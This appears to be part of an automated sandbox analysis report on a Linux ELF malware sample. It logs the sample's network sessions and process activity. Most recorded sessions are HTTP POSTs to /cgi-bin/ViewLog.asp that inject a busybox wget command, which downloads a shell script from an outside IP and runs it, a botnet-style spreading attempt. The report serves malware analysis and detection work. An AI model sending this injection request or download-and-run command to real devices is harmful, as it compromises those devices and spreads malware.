                                                        1060192.168.2.234570094.123.57.418080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.073393106 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1061192.168.2.234079694.122.231.1258080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.073471069 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1062192.168.2.235172094.120.107.2528080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.075576067 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1063192.168.2.235404462.29.8.1228080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.076276064 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1064192.168.2.235339662.150.151.1748080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.117013931 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:39.499130964 CEST109INHTTP/1.1 302 Found
                                                        Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1065192.168.2.233697494.131.158.1008080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.404751062 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:39.743343115 CEST433INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:40 GMT
                                                        Server: Apache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1066192.168.2.235380095.86.91.148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.424262047 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1067192.168.2.234103262.104.102.268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.644431114 CEST233INHTTP/1.1 400 Bad Request
                                                        Content-type: text/html
                                                        Date: Sun, 14 Apr 2024 16:37:39 GMT
                                                        Last-modified: Sun, 14 Apr 2024 16:37:39 GMT
                                                        Server: GIANTS Dedicated Server GIANTS Dedicated Server/9.2.0.0
                                                        Content-Length: 58


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1068192.168.2.234420885.67.132.1088080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:39.717858076 CEST334INHTTP/1.0 400 Bad Request
                                                        Server: httpd/2.0
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        Date: Sun, 14 Apr 2024 14:37:39 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1069192.168.2.2343202202.75.147.1332323
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:40.935764074 CEST62INHTTP/1.0 404 FAIL
                                                        Content-length:5
                                                        Connection:Close
                                                        Data Raw: 45 52 52 4f 52
                                                        Data Ascii: ERROR
                                                        Apr 14, 2024 16:37:41.037703037 CEST62INHTTP/1.0 404 FAIL
                                                        Content-length:5
                                                        Connection:Close
                                                        Data Raw: 45 52 52 4f 52
                                                        Data Ascii: ERROR
                                                        Apr 14, 2024 16:37:41.244854927 CEST62INHTTP/1.0 404 FAIL
                                                        Content-length:5
                                                        Connection:Close
                                                        Data Raw: 45 52 52 4f 52
                                                        Data Ascii: ERROR


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1070192.168.2.2343200202.75.147.1332323
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:40.937462091 CEST62INHTTP/1.0 404 FAIL
                                                        Content-length:5
                                                        Connection:Close
                                                        Data Raw: 45 52 52 4f 52
                                                        Data Ascii: ERROR
                                                        Apr 14, 2024 16:37:41.038072109 CEST62INHTTP/1.0 404 FAIL
                                                        Content-length:5
                                                        Connection:Close
                                                        Data Raw: 45 52 52 4f 52
                                                        Data Ascii: ERROR
                                                        Apr 14, 2024 16:37:41.246129990 CEST62INHTTP/1.0 404 FAIL
                                                        Content-length:5
                                                        Connection:Close
                                                        Data Raw: 45 52 52 4f 52
                                                        Data Ascii: ERROR


                                                        HTTPS Connections

                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                        Apr 14, 2024 16:35:16.729193926 CEST54.171.230.55443192.168.2.2333606CN=motd.ubuntu.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USThu Mar 07 10:27:55 CET 2024 Fri Sep 04 02:00:00 CEST 2020Wed Jun 05 11:27:54 CEST 2024 Mon Sep 15 18:00:00 CEST 2025771,4866-4867-4865-49196-49200-163-159-52393-52392-52394-49327-49325-49315-49311-49245-49249-49239-49235-49195-49199-162-158-49326-49324-49314-49310-49244-49248-49238-49234-49188-49192-107-106-49267-49271-196-195-49187-49191-103-64-49266-49270-190-189-49162-49172-57-56-136-135-49161-49171-51-50-69-68-157-49313-49309-49233-156-49312-49308-49232-61-192-60-186-53-132-47-65-255,0-11-10-35-22-23-13-43-45-51,29-23-30-25-24,0-1-2fb4726d465c5f28b84cd6d14cedd13a7
                                                        CN=R3, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USFri Sep 04 02:00:00 CEST 2020Mon Sep 15 18:00:00 CEST 2025

                                                        System Behavior

                                                        General

                                                        Start time (UTC):14:34:50
                                                        Start date (UTC):14/04/2024
                                                        Path:/tmp/HfuP5Csj29.elf
                                                        Arguments:/tmp/HfuP5Csj29.elf
                                                        File size:5773336 bytes
                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:34:51
                                                        Start date (UTC):14/04/2024
                                                        Path:/tmp/HfuP5Csj29.elf
                                                        Arguments:-
                                                        File size:5773336 bytes
                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:34:51
                                                        Start date (UTC):14/04/2024
                                                        Path:/tmp/HfuP5Csj29.elf
                                                        Arguments:-
                                                        File size:5773336 bytes
                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:34:51
                                                        Start date (UTC):14/04/2024
                                                        Path:/tmp/HfuP5Csj29.elf
                                                        Arguments:-
                                                        File size:5773336 bytes
                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:34:51
                                                        Start date (UTC):14/04/2024
                                                        Path:/tmp/HfuP5Csj29.elf
                                                        Arguments:-
                                                        File size:5773336 bytes
                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                        General

                                                        Start time (UTC):14:34:51
                                                        Start date (UTC):14/04/2024
                                                        Path:/tmp/HfuP5Csj29.elf
                                                        Arguments:-
                                                        File size:5773336 bytes
                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                        General

                                                        Start time (UTC):14:34:51
                                                        Start date (UTC):14/04/2024
                                                        Path:/tmp/HfuP5Csj29.elf
                                                        Arguments:-
                                                        File size:5773336 bytes
                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                        General

                                                        Start time (UTC):14:34:51
                                                        Start date (UTC):14/04/2024
                                                        Path:/tmp/HfuP5Csj29.elf
                                                        Arguments:-
                                                        File size:5773336 bytes
                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:34:51
                                                        Start date (UTC):14/04/2024
                                                        Path:/tmp/HfuP5Csj29.elf
                                                        Arguments:-
                                                        File size:5773336 bytes
                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:34:51
                                                        Start date (UTC):14/04/2024
                                                        Path:/tmp/HfuP5Csj29.elf
                                                        Arguments:-
                                                        File size:5773336 bytes
                                                        MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/rm
                                                        Arguments:rm -f /tmp/tmp.0p6hgVyDzb /tmp/tmp.mbEvCYH2N6 /tmp/tmp.A9cxoroPmn
                                                        File size:72056 bytes
                                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/cat
                                                        Arguments:cat /tmp/tmp.0p6hgVyDzb
                                                        File size:43416 bytes
                                                        MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/head
                                                        Arguments:head -n 10
                                                        File size:47480 bytes
                                                        MD5 hash:fd96a67145172477dd57131396fc9608

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/tr
                                                        Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                        File size:51544 bytes
                                                        MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/cut
                                                        Arguments:cut -c -80
                                                        File size:47480 bytes
                                                        MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/cat
                                                        Arguments:cat /tmp/tmp.0p6hgVyDzb
                                                        File size:43416 bytes
                                                        MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/head
                                                        Arguments:head -n 10
                                                        File size:47480 bytes
                                                        MD5 hash:fd96a67145172477dd57131396fc9608

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/tr
                                                        Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
                                                        File size:51544 bytes
                                                        MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/cut
                                                        Arguments:cut -c -80
                                                        File size:47480 bytes
                                                        MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/dash
                                                        Arguments:-
                                                        File size:129816 bytes
                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):14:35:17
                                                        Start date (UTC):14/04/2024
                                                        Path:/usr/bin/rm
                                                        Arguments:rm -f /tmp/tmp.0p6hgVyDzb /tmp/tmp.mbEvCYH2N6 /tmp/tmp.A9cxoroPmn
                                                        File size:72056 bytes
                                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                        Chronological Activities